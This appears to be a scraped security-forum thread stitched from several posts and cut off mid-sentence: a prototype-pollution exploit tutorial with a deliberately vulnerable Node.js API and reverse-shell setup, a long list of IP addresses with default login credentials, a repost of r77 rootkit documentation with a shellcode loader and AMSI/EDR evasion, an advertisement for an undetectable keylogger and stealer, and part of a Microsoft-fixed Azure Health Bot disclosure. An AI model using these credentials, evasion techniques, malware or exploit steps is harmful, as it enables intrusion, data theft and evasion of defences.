vulnerable NodeJS/Express API - app.js 'use strict'; const express = require('express'); const bodyParser = require('body-parser') // App const app = express(); app.use(bodyParser.json()) const config = { //allowEval: false } global.users = { "admin": {firstName: "The", lastName: "Admin"}, "bob": {firstName: "Bob", lastName: "Smith"}, } var findUserByUsername = function (username, callback) { if (!users[username]) return callback(new Error( 'No user matching ' + username ) ); return callback(null, users[username]); } function addUser( user ) { Object.assign(users, user); } function updateUser(username, prop, value){ users[username][prop] = value; } app.get("/api/users", (req, res) => { return res.status(200).send(users); }); app.get("/api/users/:username", (req, res) => { var username = req.params.username; findUserByUsername(username, function(error, user) { if (error) return res.status(404).send('User not found'); return res.status(200).send(user); }); }); app.post("/api/users", (req, res) => { var user = JSON.parse(JSON.stringify(req.body)); addUser(user); return res.status(200).send(user); }); app.put("/api/users/:username", (req, res) => { var username = req.params.username; var user = JSON.parse(JSON.stringify(req.body)); for(var attr in user){ updateUser(username, attr, user[attr]); } findUserByUsername(username, function(error, user) { if (error) return res.status(404).send('User not found'); return res.status(200).send(user); }); }) app.post("/api/eval", (req, res) => { var body = JSON.parse(JSON.stringify(req.body)); if (!config.allowEval){ console.log('allowEval not set!'); return res.status(403).send(); } console.log("allowEval IS set. RCE on its way..."); eval(body.code) return res.status(200).send(); }); app.listen(3000, '0.0.0.0'); console.log("Vulnerable API running..."); The things I want you to zoom into are the following: There is a dangerous sink in the POST endpoint for /api/eval (around line 69). It is protected by a simple variable in the config object called allowEval. It’s not set by default, which means this endpoint will never successfully run the dangerous eval() operation. We want to abuse the server and find a way to get here. The PUT endpoint for /api/users is vulnerable to server-side prototype pollution, following the pattern we discussed earlier where obj[a][b] = c, which we can see in the updateUser() function on line 34. OK, so with that outlined, let’s go about exploiting this API and get it to run our own malicious code to send us a remote shell from the API server. Exploring the API So if we examine the code closely, we can see that when updating a user Express will iterate over each property sent to the endpoint and update the object based on the username. If we wanted to update the “admin” user, we could send a payload that looks something like this: PUT /api/user/admin HTTP/1.1 Host: vuln-api.com ... { "firstName":"Bob", "lastName":"The Builder" } So on the first iteration, we would see an update look something like this: users["admin"]["firstName"] = "Bob"; You can see where this is going. This is a classic prototype pollution construct. We control the username, the property, and the value. So let’s leverage this to change the code flow of the API and get us to our dangerous sink. Exploiting the API So let’s first check to see if the /api/eval endpoint is indeed protected from our use: Sure enough, we get a 403, as expected. But look closely at the code for the endpoint. It’s simply checking the config object to see if allowEval is present. It’s not even checking if it’s true or false… it’s just checking if it’s there. Knowing we have a potential SSPP vulnerability in the PUT method for /api/users, let’s see if we can abuse that. Remember when I said this?: If an attacker can control a and c, then he can set the value of a to __proto__, and the property b will be defined for all existing objects of the application with the value of c. So, to cause prototype pollution on the server, we need to reconstruct that as: users["__proto__"]["allowEval"] = true; And that is pretty easy here. We need to change the endpoint URL path and include a JSON payload with that property. It looks something like this in Burp: Alright. Everything is staged. We can now execute the dangerous sink and run code on the API server. Let me first start a netcat listener so I can catch a reverse shell: netcat -lvp 4242 And now, with the allowEval variable polluted in the config object, we can change the code flow and run our malicious code on the /api/eval endpoint. In this case, I will get NodeJS to load a child process and exec a reverse shell: Back on your netcat listener, you should have a shell on the API server: Pwnage via prototype pollution. How sweet it is. Conclusion Now that you know what server-side prototype pollution is and how to exploit it, you should be aware of this vulnerability class in the wild. It can be challenging to detect, as it relies on the code flow of a server framework running JavaScript to achieve its malicious goals. But with enough practice and exploration into different endpoints and payloads, anything is possible. If you find an API running NodeJS during your recon, it’s worth exploring this. If you aren’t sure how to tell if an API is running NodeJS, check out my article on detecting an API’s programming language. So the next time you audit or pentest an API, make sure to look for prototype pollution potentials and see if you can manipulate code flow in your favor! Have fun. Like what you’re reading? Then join the API Hacker Inner Circle. It’s a FREE weekly newsletter designed for developers, testers, and hackers that keeps you up to date with the community and my work. Hope to see you there! Sursa: https://danaepp.com/how-to-exploit-an-api-using-prototype-pollution
  9. Saturativa babuinilor 188.103.128.39,test,test 188.101.4.234,test,test 188.110.221.102,test,test 188.111.109.145,test,test 188.111.81.183,test,test 188.111.83.110,test,test 188.111.3.107,spam,spam 188.104.129.104,info,info 188.115.86.106,contact,contact 188.111.53.131,contact,contact 188.117.28.64,test,test 188.118.196.198,spam,spam 188.120.193.50,test,test 188.0.160.104,spam,spam 188.121.37.185,test,test 188.121.39.166,test,test 188.121.39.22,test,test 188.121.63.219,test,test 188.122.47.180,test,test 188.122.44.58,test,test 188.124.31.14,test,123456 188.124.7.18,postmaster,password 188.124.7.19,postmaster,password 188.124.7.20,postmaster,password 188.124.7.21,postmaster,password 188.125.103.128,test,test 188.125.175.2,info,123456 188.128.117.213,test,test 188.130.35.132,postmaster,password 188.132.163.55,postmaster,password 188.132.163.56,postmaster,password 188.132.179.42,postmaster,password 188.132.179.44,postmaster,password 188.132.179.45,postmaster,password 188.132.179.43,postmaster,password 188.132.179.46,postmaster,password 188.132.179.47,postmaster,password 188.132.193.131,postmaster,password 188.132.193.134,postmaster,password 188.132.193.133,postmaster,password 188.132.193.130,postmaster,password 188.132.193.132,postmaster,password 188.132.214.130,test,test 188.132.235.49,test,test 188.134.77.134,test,test 188.137.115.254,test,test 188.137.114.254,test,test 188.138.109.12,test,test 188.138.116.208,test,test 188.132.238.37,backup,123456 188.138.89.172,test,test 188.165.192.198,test,test 188.165.203.114,test,123456 188.165.217.203,info,info123 188.16.52.188,test,test 188.165.252.153,test,test 188.165.33.116,test,test 188.165.41.58,test,test 188.165.42.58,test,test 188.168.65.59,test,password 188.172.240.0,test,test 188.172.240.1,test,test 188.172.240.10,test,test 188.172.240.101,test,test 188.172.240.103,test,test 188.172.240.104,test,test 188.172.240.106,test,test 188.172.240.11,test,test 188.172.240.12,test,test 188.172.240.13,test,test 188.172.240.14,test,test 188.172.240.15,test,test 188.172.240.16,test,test 188.172.240.19,test,test 188.172.240.18,test,test 188.172.240.17,test,test 188.172.240.2,test,test 188.172.240.20,test,test 188.172.240.21,test,test 188.172.240.216,test,test 188.172.240.22,test,test 188.172.240.23,test,test 188.172.240.25,test,test 188.172.240.26,test,test 188.172.240.27,test,test 188.172.240.24,test,test 188.172.240.28,test,test 188.172.240.29,test,test 188.172.240.3,test,test 188.172.240.30,test,test 188.172.240.31,test,test 188.172.240.32,test,test 188.172.240.33,test,test 188.172.240.34,test,test 188.172.240.35,test,test 188.172.240.36,test,test 188.172.240.37,test,test 188.172.240.39,test,test 188.172.240.38,test,test 188.172.240.4,test,test 188.172.240.41,test,test 188.172.240.40,test,test 188.172.240.42,test,test 188.172.240.43,test,test 188.172.240.45,test,test 188.172.240.44,test,test 188.172.240.47,test,test 188.172.240.48,test,test 188.172.240.46,test,test 188.172.240.49,test,test 188.167.14.150,fax,fax 188.174.143.204,test,test 188.177.227.74,test,test 188.177.58.206,test,test 188.178.18.114,test,test 188.172.240.51,newsletter,newsletter 188.172.240.57,contact,contact 188.172.240.54,alert,alert 188.172.240.65,contact,contact 188.172.240.56,alert,alert123 188.172.240.96,service,service 188.172.240.81,alert,alert 188.172.240.72,webmaster,password 188.172.240.74,contact,contact 188.172.240.53,webmaster,password 188.172.240.55,alert,alert 188.172.240.77,backup,password123 188.172.240.8,webmaster,password 188.172.240.86,webmaster,webmaster 188.172.240.91,webmaster,webmaster 188.172.240.82,webmaster,webmaster 188.172.240.50,contact,contact 188.172.240.7,contact,contact 188.172.240.63,alert,alert123 188.172.240.60,alert,alert 188.172.240.97,webmaster,webmaster 188.172.240.84,service,service 188.172.240.75,sms,password 188.172.240.67,webmaster,webmaster 188.172.240.73,service,service 188.172.240.87,contact,contact 188.172.240.80,contact,contact 188.172.240.59,admin,123456 188.172.240.62,alert,alert123 188.172.240.70,contact,contact 188.172.240.79,webmaster,123456 188.172.240.89,contact,contact 188.172.240.98,service,service 188.172.240.6,backup,backup 188.172.240.5,sms,password 188.172.240.83,webmaster,password 188.172.240.78,service,service 188.172.240.52,alert,alert 188.172.240.85,sms,password 188.172.240.76,sms,password 188.172.240.88,webmaster,123456 188.172.240.68,newsletter,newsletter 188.172.240.64,contact,contact 188.172.240.66,newsletter,newsletter 188.172.240.90,newsletter,newsletter 188.172.240.61,alert,alert123 188.172.240.69,alert,alert123 188.172.240.9,service,service 188.172.240.94,alert,alert 188.172.240.58,alert,alert123 188.174.11.121,admin,admin 188.183.91.58,test,test 188.186.4.254,test,test 188.190.122.141,test,test 188.190.122.77,test,test 188.193.181.102,test,test 188.200.111.90,test,test 188.200.233.77,besadmin,besadmin 188.201.19.75,postmaster,postmaster 188.201.99.138,info,info 188.203.133.238,info,password 188.203.236.251,backup,backup 188.204.6.222,info,info 188.207.178.198,info,password 188.208.10.102,test,test 188.208.10.105,test,test 188.208.10.106,test,test 188.208.10.108,test,test 188.208.10.109,test,test 188.208.10.11,test,test 188.208.10.113,test,test 188.208.10.117,test,test 188.208.10.118,test,test 188.208.10.123,test,test 188.208.10.125,test,test 188.208.10.13,test,test 188.208.10.131,test,test 188.208.10.140,test,test 188.208.10.14,test,test 188.208.10.147,test,test 188.208.10.114,test,test 188.208.10.144,test,test 188.208.10.15,test,test 188.208.10.139,test,test 188.208.10.148,test,test 188.208.10.160,test,test 188.208.10.157,test,test 188.208.10.16,test,test 188.208.10.152,test,test 188.208.10.17,test,test 188.208.10.166,test,test 188.208.10.170,test,test 188.208.10.178,test,test 188.208.10.174,test,test 188.208.10.192,test,test 188.208.10.163,test,test 188.208.10.195,test,test 188.208.10.199,test,test 188.208.10.2,test,test 188.208.10.20,test,test 188.208.10.208,test,test 188.208.10.212,test,test 188.208.10.18,test,test 188.208.10.19,test,test 188.208.10.213,test,test 188.208.10.215,test,test 188.208.10.222,test,test 188.208.10.216,test,test 188.208.10.225,test,test 188.208.10.228,test,test 188.208.10.21,test,test 188.208.10.229,test,test 188.208.10.239,test,test 188.208.10.241,test,test 188.208.10.244,test,test 188.208.10.248,test,test 188.208.10.243,test,test 188.208.10.25,test,test 188.208.10.250,test,test 188.208.10.227,test,test 188.208.10.23,test,test 188.208.10.28,test,test 188.208.10.27,test,test 188.208.10.38,test,test 188.208.10.4,test,test 188.208.10.40,test,test 188.208.10.41,test,test 188.208.10.47,test,test 188.208.10.246,test,test 188.208.10.55,test,test 188.208.10.59,test,test 188.208.10.65,test,test 188.208.10.48,test,test 188.208.10.52,test,test 188.208.10.74,test,test 188.208.10.78,test,test 188.208.10.3,test,test 188.208.10.6,test,test 188.208.10.5,test,test 188.208.10.80,test,test 188.208.10.43,test,test 188.208.10.8,test,test 188.208.10.86,test,test 188.208.10.82,test,test 188.208.10.9,test,test 188.208.10.95,test,test 188.208.10.96,test,test 188.208.10.7,test,test 188.208.12.101,test,test 188.208.10.89,test,test 188.208.12.104,test,test 188.208.12.106,test,test 188.208.12.100,test,test 188.208.12.107,test,test 188.208.12.11,test,test 188.208.12.111,test,test 188.208.12.112,test,test 188.208.12.115,test,test 188.208.12.113,test,test 188.208.12.116,test,test 188.208.12.118,test,test 188.208.12.119,test,test 188.208.12.10,test,test 188.208.12.120,test,test 188.208.12.123,test,test 188.208.12.121,test,test 188.208.12.125,test,test 188.208.12.128,test,test 188.208.12.129,test,test 188.208.12.126,test,test 188.208.12.133,test,test 188.208.12.134,test,test 188.208.12.138,test,test 188.208.12.137,test,test 188.208.12.140,test,test 188.208.12.142,test,test 188.208.12.143,test,test 188.208.12.144,test,test 188.208.12.146,test,test 188.208.12.148,test,test 188.208.12.149,test,test 188.208.12.15,test,test 188.208.12.13,test,test 188.208.12.154,test,test 188.208.12.150,test,test 188.208.12.157,test,test 188.208.12.158,test,test 188.208.12.159,test,test 188.208.12.164,test,test 188.208.12.165,test,test 188.208.12.173,test,test 188.208.12.171,test,test 188.208.12.176,test,test 188.208.12.179,test,test 188.208.12.168,test,test 188.208.12.180,test,test 188.208.12.19,test,test 188.208.12.190,test,test 188.208.12.188,test,test 188.208.12.186,test,test 188.208.12.191,test,test 188.208.12.199,test,test 188.208.12.195,test,test 188.208.12.201,test,test 188.208.12.205,test,test 188.208.12.206,test,test 188.208.12.166,test,test 188.208.12.192,test,test 188.208.12.208,test,test 188.208.12.207,test,test 188.208.12.21,test,test 188.208.12.185,test,test 188.208.12.219,test,test 188.208.12.22,test,test 188.208.12.18,test,test 188.208.12.183,test,test 188.208.12.182,test,test 188.208.12.212,test,test 188.208.12.217,test,test 188.208.12.226,test,test 188.208.12.220,test,test 188.208.12.229,test,test 188.208.12.221,test,test 188.208.12.239,test,test 188.208.12.215,test,test 188.208.12.243,test,test 188.208.12.23,test,test 188.208.12.25,test,test 188.208.12.209,test,test 188.208.12.26,test,test 188.208.12.240,test,test 188.208.12.27,test,test 188.208.12.247,test,test 188.208.12.244,test,test 188.208.12.29,test,test 188.208.12.236,test,test 188.208.12.30,test,test 188.208.12.233,test,test 188.208.12.231,test,test 188.208.12.32,test,test 188.208.12.235,test,test 188.208.12.222,test,test 188.208.12.223,test,test 188.208.12.33,test,test 188.208.12.227,test,test 188.208.12.37,test,test 188.208.12.31,test,test 188.208.12.234,test,test 188.208.12.237,test,test 188.208.12.40,test,test 188.208.12.38,test,test 188.208.12.41,test,test 188.208.12.54,test,test 188.208.12.44,test,test 188.208.12.42,test,test 188.208.12.48,test,test 188.208.12.5,test,test 188.208.12.56,test,test 188.208.12.58,test,test 188.208.12.59,test,test 188.208.12.57,test,test 188.208.12.35,test,test 188.208.12.67,test,test 188.208.12.64,test,test 188.208.12.68,test,test 188.208.12.73,test,test 188.208.12.75,test,test 188.208.12.39,test,test 188.208.12.76,test,test 188.208.12.77,test,test 188.208.12.52,test,test 188.208.12.8,test,test 188.208.12.82,test,test 188.208.12.47,test,test 188.208.12.85,test,test 188.208.12.84,test,test 188.208.12.74,test,test 188.208.12.87,test,test 188.208.12.9,test,test 188.208.12.60,test,test 188.208.12.98,test,test 188.208.12.65,test,test 188.208.12.71,test,test 188.208.12.86,test,test 188.208.12.88,test,test 188.208.12.91,test,test 188.208.4.100,test,test 188.208.4.10,test,test 188.208.4.108,test,test 188.208.4.11,test,test 188.208.4.112,test,test 188.208.4.116,test,test 188.208.4.12,test,test 188.208.4.117,test,test 188.208.4.13,test,test 188.208.4.136,test,test 188.208.4.14,test,test 188.208.4.143,test,test 188.208.4.15,test,test 188.208.4.151,test,test 188.208.4.16,test,test 188.208.4.160,test,test 188.208.4.105,test,test 188.208.4.128,test,test 188.208.4.135,test,test 188.208.4.141,test,test 188.208.4.17,test,test 188.208.4.169,test,test 188.208.4.172,test,test 188.208.4.177,test,test 188.208.4.183,test,test 188.208.4.18,test,test 188.208.4.191,test,test 188.208.4.195,test,test 188.208.4.2,test,test 188.208.4.201,test,test 188.208.4.204,test,test 188.208.4.206,test,test 188.208.4.197,test,test 188.208.4.21,test,test 188.208.4.219,test,test 188.208.4.227,test,test 188.208.4.221,test,test 188.208.4.199,test,test 188.208.4.246,test,test 188.208.4.182,test,test 188.208.4.233,test,test 188.208.4.250,test,test 188.208.4.27,test,test 188.208.4.203,test,test 188.208.4.3,test,test 188.208.4.231,test,test 188.208.4.30,test,test 188.208.4.4,test,test 188.208.4.31,test,test 188.208.4.41,test,test 188.208.4.43,test,test 188.208.4.5,test,test 188.208.4.54,test,test 188.208.4.6,test,test 188.208.4.69,test,test 188.208.4.7,test,test 188.208.4.70,test,test 188.208.4.78,test,test 188.208.4.8,test,test 188.208.4.89,test,test 188.208.4.9,test,test 188.208.4.95,test,test 188.208.4.99,test,test 188.208.6.101,test,test 188.208.6.11,test,test 188.208.6.112,test,test 188.208.6.117,test,test 188.208.4.97,test,test 188.208.4.80,test,test 188.208.4.75,test,test 188.208.4.74,test,test 188.208.6.10,test,test 188.208.4.88,test,test 188.208.4.94,test,test 188.208.6.153,test,test 188.208.6.12,test,test 188.208.6.121,test,test 188.208.6.116,test,test 188.208.6.126,test,test 188.208.6.156,test,test 188.208.6.154,test,test 188.208.6.129,test,test 188.208.6.135,test,test 188.208.6.141,test,test 188.208.6.146,test,test 188.208.6.127,test,test 188.208.6.159,test,test 188.208.6.176,test,test 188.208.6.142,test,test 188.208.6.163,test,test 188.208.6.184,test,test 188.208.6.19,test,test 188.208.6.187,test,test 188.208.6.195,test,test 188.208.6.197,test,test 188.208.6.2,test,test 188.208.6.186,test,test 188.208.6.167,test,test 188.208.6.206,test,test 188.208.6.200,test,test 188.208.6.21,test,test 188.208.6.213,test,test 188.208.6.210,test,test 188.208.6.205,test,test 188.208.6.229,test,test 188.208.6.211,test,test 188.208.6.243,test,test 188.208.6.203,test,test 188.208.6.228,test,test 188.208.6.248,test,test 188.208.6.251,test,test 188.208.6.218,test,test 188.208.6.3,test,test 188.208.6.244,test,test 188.208.6.250,test,test 188.208.6.32,test,test 188.208.6.230,test,test 188.208.6.40,test,test 188.208.6.45,test,test 188.208.6.220,test,test 188.208.6.39,test,test 188.208.6.48,test,test 188.208.6.57,test,test 188.208.6.5,test,test 188.208.6.6,test,test 188.208.6.7,test,test 188.208.6.61,test,test 188.208.6.73,test,test 188.208.6.84,test,test 188.208.6.85,test,test 188.208.6.89,test,test 188.208.6.49,test,test 188.208.6.9,test,test 188.208.6.90,test,test 188.208.6.80,test,test 188.208.6.92,test,test 188.208.6.96,test,test 188.208.6.95,test,test 188.208.6.98,test,test 188.208.6.65,test,test 188.21.102.107,test,test 188.21.127.246,besadmin,besadmin 188.213.200.10,test,test 188.213.200.100,test,test 188.213.200.101,test,test 188.213.200.102,test,test 188.213.200.105,test,test 188.213.200.104,test,test 188.213.200.106,test,test 188.213.200.107,test,test 188.213.200.108,test,test 188.213.200.11,test,test 188.213.200.111,test,test 188.213.200.112,test,test 188.213.200.113,test,test 188.213.200.114,test,test 188.213.200.115,test,test 188.213.200.116,test,test 188.213.200.118,test,test 188.213.200.117,test,test 188.213.200.120,test,test 188.213.200.12,test,test 188.213.200.121,test,test 188.213.200.122,test,test 188.213.200.123,test,test 188.213.200.124,test,test 188.213.200.128,test,test 188.213.200.129,test,test 188.213.200.126,test,test 188.213.200.127,test,test 188.213.200.13,test,test 188.213.200.130,test,test 188.213.200.131,test,test 188.213.200.132,test,test 188.213.200.133,test,test 188.213.200.135,test,test 188.213.200.136,test,test 188.213.200.14,test,test 188.213.200.138,test,test 188.213.200.139,test,test 188.213.200.140,test,test 188.213.200.141,test,test 188.213.200.142,test,test 188.213.200.143,test,test 188.213.200.144,test,test 188.213.200.145,test,test 188.213.200.149,test,test 188.213.200.15,test,test 188.213.200.150,test,test 188.213.200.146,test,test 188.213.200.147,test,test 188.213.200.151,test,test 188.213.200.154,test,test 188.213.200.155,test,test 188.213.200.16,test,test 188.213.200.152,test,test 188.213.200.160,test,test 188.213.200.161,test,test 188.213.200.162,test,test 188.213.200.169,test,test 188.213.200.17,test,test 188.213.200.163,test,test 188.213.200.170,test,test 188.213.200.171,test,test 188.213.200.173,test,test 188.213.200.177,test,test 188.213.200.174,test,test 188.213.200.18,test,test 188.213.200.181,test,test 188.213.200.19,test,test 188.213.200.20,test,test 188.213.200.22,test,test 188.213.200.21,test,test 188.213.200.23,test,test 188.213.200.25,test,test 188.213.200.239,test,test 188.213.200.24,test,test 188.213.200.26,test,test 188.213.200.27,test,test 188.213.200.28,test,test 188.213.200.29,test,test 188.213.200.31,test,test 188.213.200.30,test,test 188.213.200.33,test,test 188.213.200.32,test,test 188.213.200.36,test,test 188.213.200.37,test,test 188.213.200.34,test,test 188.213.200.35,test,test 188.213.200.40,test,test 188.213.200.4,test,test 188.213.200.38,test,test 188.213.200.39,test,test 188.213.200.41,test,test 188.213.200.42,test,test 188.213.200.44,test,test 188.213.200.43,test,test 188.213.200.45,test,test 188.213.200.46,test,test 188.213.200.47,test,test 188.213.200.49,test,test 188.213.200.48,test,test 188.213.200.5,test,test 188.213.200.51,test,test 188.213.200.50,test,test 188.213.200.52,test,test 188.213.200.53,test,test 188.213.200.54,test,test 188.213.200.57,test,test 188.213.200.58,test,test 188.213.200.55,test,test 188.213.200.56,test,test 188.213.200.59,test,test 188.213.200.60,test,test 188.213.200.6,test,test 188.213.200.61,test,test 188.213.200.62,test,test 188.213.200.63,test,test 188.213.200.64,test,test 188.213.200.65,test,test 188.213.200.66,test,test 188.213.200.67,test,test 188.213.200.68,test,test 188.213.200.69,test,test 188.213.200.71,test,test 188.213.200.7,test,test 188.213.200.70,test,test 188.213.200.72,test,test 188.213.200.74,test,test 188.213.200.73,test,test 188.213.200.76,test,test 188.213.200.75,test,test 188.213.200.77,test,test 188.213.200.79,test,test 188.213.200.78,test,test 188.213.200.84,test,test 188.213.200.85,test,test 188.213.200.83,test,test 188.213.200.8,test,test 188.213.200.89,test,test 188.213.200.88,test,test 188.213.200.90,test,test 188.213.200.9,test,test 188.213.200.91,test,test 188.213.200.93,test,test 188.213.201.133,test,test 188.213.200.95,test,test 188.213.200.97,test,test 188.213.200.96,test,test 188.213.201.32,test,test 188.213.201.130,test,test 188.213.201.56,test,test 188.213.201.70,test,test 188.213.201.71,test,test 188.213.201.96,test,test 188.215.0.10,test,test 188.215.0.100,test,test 188.215.0.101,test,test 188.215.0.103,test,test 188.215.0.104,test,test 188.215.0.105,test,test 188.215.0.102,test,test 188.215.0.106,test,test 188.215.0.108,test,test 188.215.0.109,test,test 188.215.0.111,test,test 188.215.0.113,test,test 188.215.0.107,test,test 188.215.0.110,test,test 188.215.0.114,test,test 188.215.0.115,test,test 188.215.0.116,test,test 188.215.0.11,test,test 188.215.0.117,test,test 188.215.0.118,test,test 188.215.0.119,test,test 188.215.0.12,test,test 188.215.0.120,test,test 188.215.0.122,test,test 188.215.0.121,test,test 188.215.0.125,test,test 188.215.0.126,test,test 188.215.0.123,test,test 188.215.0.127,test,test 188.215.0.129,test,test 188.215.0.124,test,test 188.215.0.13,test,test 188.215.0.130,test,test 188.215.0.131,test,test 188.215.0.132,test,test 188.215.0.134,test,test 188.215.0.128,test,test 188.215.0.135,test,test 188.215.0.133,test,test 188.215.0.139,test,test 188.215.0.14,test,test 188.215.0.140,test,test 188.215.0.142,test,test 188.215.0.143,test,test 188.215.0.144,test,test 188.215.0.137,test,test 188.215.0.149,test,test 188.215.0.15,test,test 188.215.0.136,test,test 188.215.0.150,test,test 188.215.0.148,test,test 188.215.0.152,test,test 188.215.0.153,test,test 188.215.0.145,test,test 188.215.0.154,test,test 188.215.0.155,test,test 188.215.0.156,test,test 188.215.0.157,test,test 188.215.0.158,test,test 188.215.0.159,test,test 188.215.0.151,test,test 188.215.0.16,test,test 188.215.0.160,test,test 188.215.0.162,test,test 188.215.0.163,test,test 188.215.0.164,test,test 188.215.0.161,test,test 188.215.0.167,test,test 188.215.0.168,test,test 188.215.0.166,test,test 188.215.0.169,test,test 188.215.0.17,test,test 188.215.0.171,test,test 188.215.0.165,test,test 188.215.0.172,test,test 188.215.0.173,test,test 188.215.0.174,test,test 188.215.0.176,test,test 188.215.0.170,test,test 188.215.0.179,test,test 188.215.0.18,test,test 188.215.0.180,test,test 188.215.0.181,test,test 188.215.0.183,test,test 188.215.0.187,test,test 188.215.0.19,test,test 188.215.0.195,test,test 188.215.0.190,test,test 188.215.0.196,test,test 188.215.0.178,test,test
  10. (Not my tool) Download r77 Rootkit Fileless ring 3 rootkit r77 is a ring 3 rootkit that hides everything: Files, directories Processes & CPU/GPU usage Registry keys & values Services TCP & UDP connections Junctions, named pipes, scheduled tasks Hiding by prefix Everything that starts with "$77" is hidden. Configuration System The dynamic configuration system allows to hide processes by PID and by name, file system items by full path, TCP & UDP connections of specific ports, etc. The configuration is located in HKEY_LOCAL_MACHINE\SOFTWARE\$77config and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user. In addition, the $77config key is hidden by the rootkit. Installer The deployment of r77 requires only one file: Install.exe. Execution persists r77 on the system and injects all running processes. Uninstall.exe removes r77 from the system completely, and gracefully. Install.shellcode is the shellcode equivalent of the installer. This way, the installation can be integrated without dropping Install.exe. The shellcode can simply be loaded into memory, casted to a function pointer, and executed: int main() { // 1. Load Install.shellcode from resources or from a BYTE[] // Ideally, encrypt the file and decrypt it here to avoid scantime detection. LPBYTE shellCode = ... // 2. Make the shellcode RWX. DWORD oldProtect; VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect); // 3. Cast the buffer to a function pointer and execute it. ((void(*)())shellCode)(); // This is the fileless equivalent to executing Install.exe. return 0; } Execution flow The rootkit resides in the system memory and does not write any files to the disk. This is achieved in multiple stages. This graph shows each stage from the execution of the installer all the way down to the rootkit DLL running in every process. The documentation has a chapter with extensive detail about the implementation of each stage. AV/EDR evasion Several AV and EDR evasion techniques are in use: AMSI bypass: The PowerShell inline script disables AMSI by patching amsi.dll!AmsiScanBuffer to always return AMSI_RESULT_CLEAN. Polymorphism is used to evade signature detection of the AMSI bypass. DLL unhooking: Since EDR solutions monitor API calls by hooking ntdll.dll, these hooks need to be removed by loading a fresh copy of ntdll.dll from disk and restoring the original section. Otherwise, process hollowing would be detected. Test environment The Test Console is a useful tool to inject r77 into individual processes and to test drive the configuration system. Technical Documentation Please read the technical documentation to get a comprehensive and full overview of r77 and its internals, and how to deploy and integrate it.
  11. Rapzo Logger v 1.5 ( Public Edition ) Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD [#] Firefox 3.5.0-3.6.X [#] DynDns [#] FileZilla [#] Pidgin [#] Imvu [#] No-Ip Features [25] * Full UAC Bypass & Faster Execution * Coded in Vb.NET * Min Req Is .net 2.0 Now A days every pc Have it * Cool & user friendly GUI * Easily Understandble * Encrypt Information * Encrypt E-mail information * 100% FUD from all AV's * 4 Extentions [ . exe | .scr | .pif | .com ] * Keylogger support - Smtp[Gmail,Hotmail,live,aol,] * Test E-mail - is it vaild or not. * Customize the "To" e-mail address. * Screen Logger * Cure.exe to remove server from your Compute * Usb Spreade * File pumper - Built-in * Icon Changer - Preview * Logs are nice and clear * Log Letters - ABCD etc. * Log Symbols - !@#$% etc. * Log Numbers - 12345 etc. * Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc. * Hidden really good & invisible * Send new logs over and over again * ReadMe.txt - How To Use * Vedio Tutorial - How To Use Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers Steler Logs : DOWNLOAD
  12. We have discovered multiple security vulnerabilities in the Azure Health Bot service, a patient-facing chatbot that handles medical information. The vulnerabilities, if exploited, could allow access to sensitive infrastructure and confidential medical data. All vulnerabilities have been fixed quickly following our report to Microsoft. Microsoft has not detected any sign of abuse of these vulnerabilities. We want to thank the people from Microsoft for their cooperation in remediating these issues: Dhawal, Kirupa, Gaurav, Madeline, and the engineering team behind the service. The first vulnerability allowed access to authentication credentials belonging to the customers. With continued research, we’ve found vulnerabilities allowing us to take control of a backend server of the service. That server is shared across multiple customers and has access to several databases that contain information belonging to multiple tenants. Vulnerabilities Reported Multiple sandbox escapes, unrestricted code execution as root on the bot backend Unrestricted access to authentication secrets & integration auth providers Unrestricted memory read in the bot backend, exposing sensitive secrets & cross tenant data Unrestricted deletion of other tenants' public resources The Discovery The initial research started at the Azure Health Bot management portal website. Skimming through the features available, we saw that it’s possible to connect your bot to remote data sources, and also provide authentication details. Since customers would likely connect their bot to 3rd party data, such as patient databases, appointment calendars, and so forth, it’s a very interesting target for an attacker. It’s unlikely to imagine a scenario where the customers wouldn’t want to connect the bot to their data. After fiddling with this feature, we noticed something interesting in the request that retrieves our data connection details and auth secrets. This is what a regular request looks like: https://portal-eastus.healthbot.microsoft.com/v4/test-301x6x6/integration/data-connections/1679070537717/ In this URL, “test-301x6x6” is our unique health bot instance ID, and “1679070537717” is the ID of the unique data connection we created. The response to this request was the following JSON: { "odata.metadata": "https://hbstenant2steausprod.table.core.windows.net/$metadata#test301x6x6/@Element", "etag": "W/\"datetime'2023-03-17T17%3A08%3A44.7784337Z'\"", "partitionKey": "DataConnection", "rowKey": "1679070537717", "timestamp": "2023-03-17T17:08:44.7784337Z", "type": "custom", "name": "test data connection", "description": "desc", "base_url": "https://website.com/a", "auth_provider": "", "static_parameters": "[{\"type\":\"header\",\"key\":\"Test\",\"value\":\"true\"}]" } People familiar with Azure will recognize this as an Azure Table API response. And it makes sense, the service stores our connection data in the Azure Table service, and it pulls that data directly from there. Our intuition was to start toying with the ID number of our data connection. We believe that the data connections of all customers are in the same table, and if we can query whatever ID we want from the table, we can view the data connections of other customers. Per the Azure Table API documentation, here’s how a request to retrieve data from a table looks like: https://myaccount.table.core.windows.net/tableName(PartitionKey='<partition-key>',RowKey='<row-key>') So here we have 3 variables we must fill: table name partition key row key We have all the required variables since the previous Table API response discloses all that information. Our guess was, that was the URL the backend server uses to get the information behind the scenes: https://hbstenant2steausprod.table.core.windows.net/test301x6x6(PartitionKey=’DataConnection’,RowKey=’1679070537717’) Here you can see: hbstenant2steausprod - the account name Microsoft used for storing the data. test301x6x6 - our Azure health bot instance ID. This is not a secret. (PartitionKey=’DataConnection’,RowKey=’1679070537717’): Pulling DataConnection with the ID from the request. The input in our control is the ID. The idea was to send an ID that would allow us to “break out” of our tenant and read other tenants' data. How do we do that? Since it’s all appended to a URL, the idea was to leverage URL traversal to cancel out the prepended information added by the server, and then add our own: GET /v4/test-301x6x6/integration/data-connections/%2F..%2FotherTenant(PartitionKey='DataConnection',RowKey='1679126391688/ As you can see, we encoded the slashes (%2F) which were injected into the URL, effectively turning the request into: https://hbstenant2steausprod.table.core.windows.net/test301x6x6(PartitionKey=’DataConnection’,RowKey=’1679070537717/../otherTenant(PartitionKey='DataConnection',RowKey='1679126391688') And voila! This request successfully returned the connection data of the other tenant. ‍ Hacking The Bot Backend - 3 ways to pwn the Node.js vm2 sandbox ‍ Exploring further into the service, we saw that you can execute your JavaScript code in an isolated environment. This feature lets you process data coming from the chat as part of the conversation with the end customer. We started by doing simple JS recon inside the 